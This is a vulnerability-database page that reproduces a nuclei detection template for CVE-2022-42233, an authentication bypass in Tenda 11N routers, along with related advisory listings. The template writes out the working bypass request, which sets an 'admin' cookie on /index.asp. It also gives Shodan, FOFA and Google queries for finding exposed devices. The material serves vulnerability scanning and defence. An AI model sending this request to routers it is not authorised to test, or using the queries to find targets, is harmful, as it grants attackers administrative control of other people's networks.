Lucene search
K

Tenda 11N - Authentication Bypass

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 165 Views

Tenda 11N - Authentication Bypass CVE-2022-42233, critical severity, V5.07.33_cn firmwar

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-42233
20 Oct 202220:26
circl
CNNVD
Tenda 11N 授权问题漏洞
20 Oct 202200:00
cnnvd
CVE
CVE-2022-42233
20 Oct 202200:00
cve
Cvelist
CVE-2022-42233
20 Oct 202200:00
cvelist
NVD
CVE-2022-42233
20 Oct 202217:15
nvd
OSV
CVE-2022-42233
20 Oct 202217:15
osv
Prion
Authentication flaw
20 Oct 202217:15
prion
Positive Technologies
PT-2022-26321 · Tenda · Tenda 11N
20 Oct 202200:00
ptsecurity
RedhatCVE
CVE-2022-42233
22 May 202523:53
redhatcve
Vulnrichment
CVE-2022-42233
20 Oct 202200:00
vulnrichment
Rows per page
id: CVE-2022-42233

info:
  name: Tenda 11N - Authentication Bypass
  author: For3stCo1d
  severity: critical
  description: |
    Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Unauthenticated attackers can bypass authentication by setting an admin cookie to gain full administrative access to Tenda 11N routers, enabling complete device configuration changes and network compromise.
  remediation: |
    Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233).
  reference:
    - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-42233
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-42233
    cwe-id: CWE-287
    epss-score: 0.42704
    epss-percentile: 0.98548
    cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tenda
    product: 11n_firmware
    shodan-query:
      - http.title:"Tenda 11N"
      - http.title:"tenda 11n"
    fofa-query:
      - product=="Tenda-11N-Wireless-AP"
      - product=="tenda-11n-wireless-ap"
      - title="tenda 11n"
    google-query: intitle:"tenda 11n"
  tags: cve,cve2022,tenda,auth-bypass,router,iot,vuln

http:
  - raw:
      - |
        GET /index.asp HTTP/1.1
        Host: {{Hostname}}
        Cookie: admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'def_wirelesspassword'
          - 'Tenda 11N'
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - 'GoAhead-Webs'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205dc54a6a4daffdd931a3f1ed61047efd3affa153f8ce78fbc118e5a47579808f022100c38995e72e8bf78dadb3e775de28b5940d0b359134dc448af99c0622882dfba5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.42704
SSVC
165